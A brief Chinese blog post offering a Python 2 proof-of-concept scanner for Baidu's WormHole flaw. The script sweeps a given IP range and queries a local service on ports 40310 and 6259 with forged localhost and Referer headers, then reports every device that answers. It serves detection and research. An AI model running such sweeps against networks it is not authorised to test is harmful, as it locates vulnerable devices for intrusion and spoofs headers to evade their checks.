百度WormHole漏洞检测POC
WormHole的检测代码,随手python写的。
#exploit write by fenlog,baidu wormhole POC.
#QQ:345382462
import urllib2, urllib
import sys
headers = {
"Accept": "*/*",
"Host": "127.0.0.1",
"remote-addr": "127.0.0.1",
"Referer": "http://www.baidu.com/"
}
def ip2num(ip):
ip = [int(x) for x in ip.split('.')]
return ip[0]<<24 | ip[1]<<16 | ip[2]<<8 | ip[3]
def num2ip(num):
return '%s.%s.%s.%s' % ((num & 0xff000000) >> 24, (num & 0x00ff0000) >> 16, (num & 0x0000ff00) >> 8, num & 0x000000ff)
def URLRequest(url):
try:
request = urllib2.Request(url = url,headers = headers)
response = urllib2.urlopen(request)
return response.read()
except:
return ""
if len(sys.argv) == 3:
ipstart = ip2num(sys.argv[1])
ipend = ip2num(sys.argv[2])
elif (len(sys.argv) == 2):
ipstart = ip2num(sys.argv[1])
ipend = ipstart
else:
print "Baidu WarmHole POC by www.fenlog.com\nUsage1: %s TargetIP \nUsage2: %s StartIP EndIP" % (sys.argv[0], sys.argv[0])
exit(0)
if (ipstart > ipend):
print "Target IP Err"
exit(0)
urllib2.socket.setdefaulttimeout(3)
for targetip in range(ipstart, ipend + 1):
strip = num2ip(targetip)
print "Scan %s..." % (strip)
url1 = "http://%s:%d/getserviceinfo?mcmdf=inapp_baidu_bdgjs&callback=jsonp" % (strip, 40310)
url2 = "http://%s:%d/getserviceinfo?mcmdf=inapp_baidu_bdgjs&callback=jsonp" % (strip, 6259)
ret = URLRequest(url1)
if (len(ret) == 0):
ret = URLRequest(url2)
if (len(ret) > 0):
print "Found %s:%s" % (strip, ret)
print "Scan %d IPs Finish!" % (ipend - ipstart + 1)